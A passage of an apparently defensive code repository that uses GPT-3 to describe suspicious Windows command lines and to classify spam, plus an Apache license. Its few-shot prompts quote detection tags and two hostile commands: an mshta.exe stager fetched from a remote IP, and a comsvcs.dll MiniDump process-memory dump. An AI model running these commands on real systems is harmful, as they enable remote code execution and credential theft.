scores 49 | if weight_desc_score>0 and weight_tags_score>0: 50 | desc_score = np.dot(reference_code_emb, desc_matrix[ix]) 51 | tags_score = np.dot(tags_emb, desc_matrix[ix]) 52 | score = (1-weight_desc_score-weight_tags_score) * code_score + weight_desc_score * desc_score + weight_tags_score * tags_score 53 | elif weight_desc_score>0: 54 | desc_score = np.dot(reference_code_emb, desc_matrix[ix]) 55 | tags_score = .0 56 | score = (1-weight_desc_score) * code_score + weight_desc_score * desc_score 57 | elif weight_tags_score>0: 58 | desc_score = .0 59 | tags_score = np.dot(reference_code_emb, desc_matrix[ix]) 60 | score = (1-weight_tags_score) * code_score + weight_tags_score * tags_score 61 | else: 62 | desc_score = .0 63 | tags_score = .0 64 | score = code_score 65 | logger.info("===\n{:.3f}, {:.3f}, {:.3f}, {:.3f}".format( 66 | score, code_score, desc_score, tags_score)) 67 | logger.info(desc) 68 | logger.info(generated_cmd) 69 | score_list.append((score, code_score, desc_score, tags_score, cmd, generated_cmd, desc)) 70 | return score_list 71 | 72 | 73 | def get_sorted_similarity_score_list( 74 | cmd, 75 | tags, 76 | items, 77 | engine="text-similarity-babbage-001", 78 | weight_desc_score=0.3, 79 | weight_tags_score=0.2, 80 | max_cmd_len=200 81 | ): 82 | """ 83 | return a list of description list sorted similarity scores. 
84 | :param cmd: command line data 85 | :param tags: tags data 86 | :param items: contains a list of (desc, generated_cmd) 87 | :param engine: engine for similarity score 88 | :param weight_desc_score: the weight for description score 89 | :param weight_tags_score: the weight for tags score 90 | :param max_cmd_len: max length of command line data 91 | """ 92 | score_list = get_embedding_similarity_score_list( 93 | cmd, tags, items, 94 | weight_desc_score=weight_desc_score, 95 | weight_tags_score=weight_tags_score, 96 | engine=engine, max_cmd_len=max_cmd_len) 97 | 98 | return sorted(score_list, key=lambda x:x[0], reverse=True) 99 | 100 | 101 | def get_ngrams_bleu_similarity_score( 102 | reference, 103 | candidate_list 104 | ): 105 | """ 106 | returns similarity scores using sentence_bleu. 107 | :param reference: reference text 108 | :param candidate_list: a list of candidates 109 | """ 110 | score_list = [] 111 | for candidate in candidate_list: 112 | reference_tokens = [reference.split()] 113 | candidate_tokens = candidate.split() 114 | score = sentence_bleu(reference_tokens, candidate_tokens, 115 | weights=(0.5, 0.5, 0., 0.)) 116 | score_list.append(score) 117 | return score_list 118 | 119 | 120 | def get_semantic_similarity_score( 121 | reference, 122 | candidate_list, 123 | engine="text-similarity-babbage-001" 124 | ): 125 | """ 126 | return similarity scores using cosine similarity with gpt3 embeddings. 
127 | :param reference: reference text 128 | :param candidate_list: a list of candidates 129 | :param engine: engine for similarity score 130 | """ 131 | items = [reference] + candidate_list 132 | embeddings_list = get_embeddings(items, engine=engine) 133 | reference_emb = embeddings_list[0] 134 | score_list = [] 135 | for candidate_embeddings in embeddings_list[1:]: 136 | #get a cosine similarity score 137 | score = np.dot(reference_emb, candidate_embeddings) 138 | score_list.append(score) 139 | return score_list 140 | -------------------------------------------------------------------------------- /command_analyzer/prompt_data.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | import logging 4 | import openai 5 | 6 | 7 | openai.api_key = os.getenv("OPENAI_API_KEY") 8 | 9 | logging.getLogger("openai").setLevel(logging.ERROR) 10 | logging.basicConfig(format="%(asctime)s %(message)s", 11 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) 12 | logger = logging.getLogger(__name__) 13 | 14 | 15 | STR_PREFIX_CMD = '## Command\n' 16 | STR_PREFIX_TAGS = '## Tags\n' 17 | 18 | STR_PREFIX_DESC = '## Description\nThe command' 19 | STR_PREFIX_ABOVE_DESC = '## Description\nThe above command' 20 | STR_PREFIX_BELOW_DESC = '## Description\nThe below command' 21 | 22 | STR_PREFIX_FIRST_DESC = '## Description1\nThe command' 23 | STR_PREFIX_SECOND_DESC = '## Description2\nThe command' 24 | STR_PREFIX_COMBINED_DESC = 'The Description1 and Description2 describe the Command, combine them and complete the Description.\n' 25 | 26 | 27 | PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES = '''### 28 | ## Command 29 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta 30 | ## Tags 31 | win_pc_suspicious_tasklist_command,win_suspicious_findstr 32 | ## Description 33 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 
5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command. 34 | ### 35 | ## Tags 36 | win_process_dump_rundll32_comsvcs,win_susp_wmi_execution,win_susp_wmic_proc_create_rundll32 37 | ## Description 38 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file. 39 | ## Command 40 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\" 41 | ### 42 | ''' 43 | 44 | 45 | PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES ='''### 46 | ## Command 47 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta 48 | ## Description 49 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command. 50 | ## Description 51 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file. 52 | ## Command 53 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\" 54 | ### 55 | ''' 56 | 57 | 58 | def preprocess_cmd_data(cmd, max_cmd_len): 59 | """ 60 | replaces "\n" with " " and truncates the data to max_cmd_len characters.
61 | :param cmd: command line data 62 | :param max_cmd_len: the max data length 63 | """ 64 | return cmd.replace("\n", " ")[:max_cmd_len] 65 | 66 | 67 | def preprocess_tags_str(tags): 68 | """ 69 | replaces susp with suspicious; otherwise, it can be misinterpreted as suspended 70 | :param tags: tags 71 | """ 72 | if tags: 73 | tags = tags.replace("_susp_", "_suspicious_") 74 | return tags 75 | 76 | 77 | def get_prompt_for_desc_from_cmd_tag( 78 | cmd, 79 | tags, 80 | max_cmd_len=200, 81 | include_tag=True, 82 | include_prefix=False 83 | ): 84 | """ 85 | returns a prompt as 86 | ## Command 87 | cmd.exe 88 | ## Tags 89 | win_tags 90 | ## Description 91 | the above command 92 | """ 93 | cmd = preprocess_cmd_data(cmd, max_cmd_len) 94 | 95 | if include_tag: 96 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES 97 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_ABOVE_DESC 98 | else: 99 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES 100 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_ABOVE_DESC 101 | 102 | if include_prefix: 103 | prompt = prefix + prompt 104 | return prompt 105 | 106 | 107 | def get_prompt_for_cmd_from_tag_desc( 108 | tags, 109 | desc, 110 | cmd, 111 | max_cmd_len=200, 112 | include_tag=True, 113 | include_prefix=False 114 | ): 115 | """ 116 | returns a prompt as 117 | ## Tags 118 | win_tags 119 | ## Description 120 | the below command will ...
121 | ## Command 122 | cmd.exe 123 | """ 124 | cmd = preprocess_cmd_data(cmd, max_cmd_len) 125 | 126 | if include_tag: 127 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES 128 | prompt = STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd 129 | else: 130 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES 131 | prompt = STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd 132 | 133 | if include_prefix: 134 | prompt = prefix + prompt 135 | return prompt 136 | 137 | 138 | def get_prompt_for_combined_desc( 139 | cmd, 140 | desc1, 141 | desc2, 142 | max_cmd_len=200 143 | ): 144 | """ 145 | returns a prompt as 146 | STR_PREFIX_COMBINED_DESC 147 | ## Command 148 | ... 149 | ## Description1 150 | The command 151 | ## Description2 152 | The command 153 | ## Description 154 | The command 155 | """ 156 | cmd = preprocess_cmd_data(cmd, max_cmd_len) 157 | 158 | prompt = STR_PREFIX_COMBINED_DESC + STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_FIRST_DESC + desc1 + "\n" 159 | prompt += STR_PREFIX_SECOND_DESC + desc2 + "\n" + STR_PREFIX_DESC 160 | return prompt 161 | 162 | 163 | def run_openai_completion( 164 | prompt, 165 | engine, 166 | n, 167 | temperature=0.7, 168 | max_tokens=300, 169 | ): 170 | """ 171 | calls the openai completion api. 172 | :param prompt: prompt data 173 | :param engine: openai engine 174 | :param n: number of outputs 175 | :param temperature: temperature to control randomness, ranging between 0.0 and 1.0 176 | :param max_tokens: max output token size 177 | """ 178 | # "\n" is added to the stop sequences to cut off multi-line python code text 179 | return openai.Completion.create( 180 | prompt=prompt, 181 | engine=engine, 182 | n=n, 183 | temperature=temperature, 184 | max_tokens=max_tokens, 185 | stop=["##", "\n"] 186 | ) 187 | 188 | 189 | def generate_text_list_with_prompt( 190 | prompt, 191 | engine="code-davinci-002", 192 | n=5, 193 | temperature=0.7, 194 | sleep_time=30 195 | ): 196 | """ 197 | generates a list of texts from the prompt.
198 | :param prompt: prompt data 199 | :param engine: openai engine 200 | :param n: number of outputs 201 | :param temperature: temperature to control randomness, ranging between 0.0 and 1.0 203 | :param sleep_time: sleep time in seconds 204 | """ 205 | text_list = [] 206 | while True: 207 | #if there are temporary errors, then sleep and retry 208 | try: 209 | logging.debug("prompt:{}".format(prompt)) 210 | res = run_openai_completion( 211 | prompt, engine=engine, n=n, temperature=temperature) 212 | logging.debug("res:{}".format(res)) 213 | text_list = [item['text'] for item in res['choices']] 214 | break 215 | except openai.error.RateLimitError as ex: 216 | logging.error("RateLimitError, ex:{}".format(ex)) 217 | time.sleep(sleep_time) 218 | except openai.error.APIConnectionError as ex: 219 | logging.error("APIConnectionError, ex:{}".format(ex)) 220 | time.sleep(sleep_time) 221 | return text_list 222 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity.
For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /spam_detector/gpt3_models.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | import pandas as pd 4 | import logging 5 | from sklearn.metrics import classification_report 6 | import openai 7 | 8 | 9 | # set your openai api key 10 | openai.api_key = os.getenv("OPENAI_API_KEY") 11 | # disable openai's logging messages 12 | logging.getLogger("openai").setLevel(logging.ERROR) 13 | 14 | logging.basicConfig(format="%(asctime)s %(message)s", 15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO) 16 | logger = logging.getLogger(__name__) 17 | 18 | 19 | PROMPT_TEMPLATE = "Classify the {data_type} as {positive_label} or {negative_label}." 
20 | EXAMPLE_TEMPLATE = "\n{data_type}: {text}\nLabel: {label}" 21 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:" 22 | 23 | 24 | def generate_prompt_text( 25 | df, 26 | data_type="Message", 27 | positive_label="Spam", 28 | negative_label="Ham", 29 | column_text="text", 30 | column_label="label" 31 | ): 32 | """ 33 | generate a prompt from the input df. 34 | :param df: data frame for input data 35 | :param data_type: the type of data 36 | :param positive_label: the value for positive label 37 | :param negative_label: the value for negative label 38 | :param column_text: column for text 39 | :param column_label: column for label 40 | """ 41 | prompt = PROMPT_TEMPLATE.format( 42 | data_type=data_type, positive_label=positive_label, negative_label=negative_label) 43 | if df is None or len(df) == 0: 44 | return prompt 45 | 46 | for _ix, row in df.iterrows(): 47 | text = row[column_text] 48 | label = row[column_label] 49 | example_text = EXAMPLE_TEMPLATE.format( 50 | data_type=data_type, text=text, label=label) 51 | prompt += example_text 52 | return prompt 53 | 54 | 55 | def get_openai_completion( 56 | prompt, 57 | model_name="text-davinci-002", 58 | max_tokens=6, 59 | sleep_time=60 60 | ): 61 | """ 62 | get a completion response from openai. 63 | :param prompt: the input prompt 64 | :param model_name: model name 65 | :param max_tokens: the max token size for response 66 | :param sleep_time: sleep time in seconds 67 | """ 68 | label = None 69 | while True: 70 | try: 71 | logging.debug("prompt:{}".format(prompt)) 72 | res = openai.Completion.create( 73 | model=model_name, 74 | prompt=prompt, 75 | max_tokens=max_tokens, 76 | temperature=0, 77 | stop="\n" 78 | ) 79 | logging.debug("res:{}".format(res)) 80 | 81 | #remove the first white space and return the first word as a label. 
82 | completion = res["choices"][0]["text"].strip() 83 | label = completion.split()[0] if completion else None 84 | break 85 | except openai.error.RateLimitError as ex: 86 | logging.info("RateLimitError, ex:{}".format(ex)) 87 | time.sleep(sleep_time) 88 | except openai.error.APIConnectionError as ex: 89 | logging.info("APIConnectionError, ex:{}".format(ex)) 90 | time.sleep(sleep_time) 91 | return label 92 | 93 | 94 | def upload_train_jsonl_file( 95 | path_jsonl, 96 | df_train, 97 | data_type="Message", 98 | positive_label="Spam", 99 | negative_label="Ham", 100 | column_text="text", 101 | column_label="label", 102 | purpose="fine-tune", 103 | fine_tune_context_sample_size=4 104 | ): 105 | """ 106 | upload a train jsonl file to openai. 107 | :param path_jsonl: the path for training jsonl file 108 | :param df_train: df for training data 109 | :param data_type: data type 110 | :param positive_label: the value for positive label 111 | :param negative_label: the value for negative label 112 | :param column_text: column for text 113 | :param column_label: column for label 114 | :param purpose: the purpose of training data, fine-tune or classifications 115 | :param fine_tune_context_sample_size: the sample size for prompt context 116 | """ 117 | text_label = "Label:" 118 | dict_items = [] 119 | for ix in range(0, len(df_train), fine_tune_context_sample_size): 120 | df_items = df_train.iloc[ix:ix+fine_tune_context_sample_size] 121 | context_prompt = generate_prompt_text( 122 | df_items, data_type=data_type, 123 | positive_label=positive_label, negative_label=negative_label, 124 | column_text=column_text, column_label=column_label) 125 | label_idx = context_prompt.rfind(text_label) + len(text_label) 126 | prompt = context_prompt[:label_idx] 127 | completion = context_prompt[label_idx:] 128 | dict_items.append({"prompt": prompt, "completion": completion}) 129 | 130 | df = pd.DataFrame(dict_items) 131 | df.to_json(path_jsonl, orient="records", lines=True) 132 | logger.info("train_jsonl:{},
df.shape:{}".format(path_jsonl, df.shape)) 133 | 134 | #upload the file to openai 135 | try: 136 | res = openai.File.create(file=open(path_jsonl), purpose=purpose) 137 | train_file_id = res["id"] 138 | except Exception as ex: 139 | logger.error("openai.File.create() got an error, ex:{}".format(ex)) 140 | train_file_id = None 141 | return train_file_id 142 | 143 | 144 | def retrieve_openai_model(fine_tune_id): 145 | """ 146 | retrieve the status of model fine-tuning. 147 | :param fine_tune_id: the id of the fine-tune job 148 | """ 149 | try: 150 | res = openai.FineTune.retrieve(id=fine_tune_id) 151 | id = res["id"] 152 | status = res["status"] # the status will be succeeded when completed. 153 | fine_tuned_model = res["fine_tuned_model"] 154 | logger.info("id:{}, status:{}, fine_tuned_model:{}".format( 155 | id, status, fine_tuned_model)) 156 | except Exception as ex: 157 | logger.error("openai.FineTune.retrieve() got an error, ex:{}".format(ex)) 158 | status, fine_tuned_model = None, None 159 | return status, fine_tuned_model 160 | 161 | 162 | def finetune_openai_model( 163 | training_file_id, 164 | suffix="detection", 165 | model="davinci", 166 | n_epochs=2, 167 | sleep_time_for_finetuning=60 168 | ): 169 | """ 170 | fine-tune an openai model.
171 | :param training_file_id: the file id for training data 172 | :param suffix: suffix for the model name 173 | :param model: the baseline model name 174 | :param n_epochs: number of training epochs 175 | :param sleep_time_for_finetuning: sleep time in seconds 176 | """ 177 | logger.info("## finetune_openai_model: {}".format(locals())) 178 | 179 | try: 180 | res = openai.FineTune.create(training_file=training_file_id, 181 | suffix=suffix, 182 | model=model, 183 | n_epochs=n_epochs) 184 | fine_tune_id = res["id"] 185 | status = res["status"] 186 | fine_tuned_model = res["fine_tuned_model"] 187 | logger.info("fine_tune_id:{}, status:{}, fine_tuned_model:{}".format( 188 | fine_tune_id, status, fine_tuned_model)) 189 | except Exception as ex: 190 | return None 191 | 192 | fine_tuned_model = None 193 | if sleep_time_for_finetuning > 0: 194 | while status not in ("succeeded", "failed", "cancelled"): 195 | time.sleep(sleep_time_for_finetuning) 196 | try: 197 | status, fine_tuned_model = retrieve_openai_model(fine_tune_id) 198 | logger.info("finetuning status:{}".format(status)) 199 | except Exception as ex: 200 | logger.info( 201 | "finetuning retrieve_openai_model ex:{}".format(ex)) 202 | logger.info("finetuning status response:{}".format(res)) 203 | return fine_tuned_model 204 | 205 | 206 | def fine_tune_gpt3_model( 207 | df_train, 208 | path_train_jsonl, 209 | model_name, 210 | data_type="Message", 211 | positive_label="Spam", 212 | negative_label="Ham", 213 | column_text="text", 214 | column_label="label", 215 | fine_tune_context_sample_size=4 216 | ): 217 | """ 218 | fine-tune a gpt3 model with the training dataset.
219 | :param df_train: df for training data 220 | :param path_train_jsonl: file path for training json file 221 | :param model_name: baseline model name 222 | :param data_type: data type 223 | :param positive_label: the value for positive label 224 | :param negative_label: the value for negative label 225 | :param column_text: the column for text 226 | :param column_label: the column for label 227 | :param fine_tune_context_sample_size: sample size for context prompt 228 | """ 229 | training_file_id = upload_train_jsonl_file( 230 | path_train_jsonl, 231 | df_train, 232 | data_type=data_type, 233 | positive_label=positive_label, 234 | negative_label=negative_label, 235 | column_text=column_text, 236 | column_label=column_label, 237 | purpose="fine-tune", 238 | fine_tune_context_sample_size=fine_tune_context_sample_size 239 | ) 240 | logger.info("training_file_id:{}".format(training_file_id)) 241 | if training_file_id is None: 242 | return None 243 | 244 | fine_tuned_model_train = finetune_openai_model( 245 | training_file_id=training_file_id, 246 | suffix="detection_{}".format(data_type.lower()), 247 | model=model_name, 248 | n_epochs=2, 249 | sleep_time_for_finetuning=60 250 | ) 251 | logger.info("fine_tuned_model_train:{}".format(fine_tuned_model_train)) 252 | return fine_tuned_model_train 253 | 254 | 255 | def classify_message( 256 | message, 257 | path_train_data="spam_data/experiment_1/train_2.csv", 258 | num_samples_in_prompt=2 259 | ): 260 | """ 261 | classify the input message as spam or ham. 262 | spam_data/experiment_1/train_2.csv file has one ham and one spam samples. 
263 | :param message: message data 264 | :param path_train_data: file path for few-shot samples 265 | :param num_samples_in_prompt: the number of samples in prompt 266 | """ 267 | df_train = pd.read_csv(path_train_data, sep="\t")[:num_samples_in_prompt] 268 | 269 | context_prompt = generate_prompt_text( 270 | df_train, data_type="Message", 271 | positive_label="Spam", negative_label="Ham", 272 | column_text="text", column_label="label") 273 | 274 | query_text = QUERY_TEMPLATE.format(data_type="Message", text=message) 275 | prompt = context_prompt + query_text 276 | logger.info("prompt:{}".format(prompt)) 277 | 278 | label = get_openai_completion(prompt, model_name="text-davinci-002") 279 | logger.info("label:{}".format(label)) 280 | return label 281 | 282 | 283 | def evaluate_gpt3_model( 284 | path_train_data, 285 | path_test_data, 286 | model_name="text-davinci-002", 287 | data_type="Message", 288 | column_text="text", 289 | column_label="label", 290 | positive_label="Spam", 291 | negative_label="Ham", 292 | fine_tune=False, 293 | fine_tuned_model="", 294 | fine_tune_context_sample_size=4, 295 | prompt_context_sample_size=3, 296 | sleep_time=1 297 | ): 298 | """ 299 | evaluate a gpt3 model with training and test datasets. 
300 | :param path_train_data: path for training dataset 301 | :param path_test_data: path for test dataset 302 | :param model_name: baseline gpt3 model name, text-davinci-002 for few-shot, davinci for fine-tuning 303 | :param data_type: data type 304 | :param column_text: the column for text 305 | :param column_label: the column for label 306 | :param positive_label: the value for positive label 307 | :param negative_label: the value for negative label 308 | :param fine_tune: True to fine-tune 309 | :param fine_tuned_model: fine-tuned model name 310 | :param fine_tune_context_sample_size: the sample size for fine-tuning context prompt 311 | :param prompt_context_sample_size: the sample size for few-shot context prompt 312 | :param sleep_time: sleep time in seconds 313 | """ 314 | df_train = pd.read_csv(path_train_data, sep="\t") 315 | logger.info("path_train_data:{}, df_train.shape:{}".format( 316 | path_train_data, df_train.shape)) 317 | 318 | if fine_tune: 319 | path_train_jsonl = path_train_data + ".finetune.jsonl" 320 | model_name = fine_tune_gpt3_model( 321 | df_train, path_train_jsonl, model_name, 322 | data_type=data_type, 323 | positive_label=positive_label, 324 | negative_label=negative_label, 325 | column_text=column_text, 326 | column_label=column_label, 327 | fine_tune_context_sample_size=fine_tune_context_sample_size) 328 | if model_name is None: 329 | return None 330 | df_train = df_train.sample(prompt_context_sample_size, replace=False) 331 | elif fine_tuned_model: 332 | model_name = fine_tuned_model 333 | df_train = df_train.sample(prompt_context_sample_size, replace=False) 334 | 335 | context_prompt = generate_prompt_text( 336 | df_train, data_type=data_type, 337 | positive_label=positive_label, negative_label=negative_label, 338 | column_text=column_text, column_label=column_label) 339 | logger.info("context_prompt:{}".format(context_prompt)) 340 | 341 | df_test = pd.read_csv(path_test_data, sep="\t") 342 | logger.info("path_test_data:{}, 
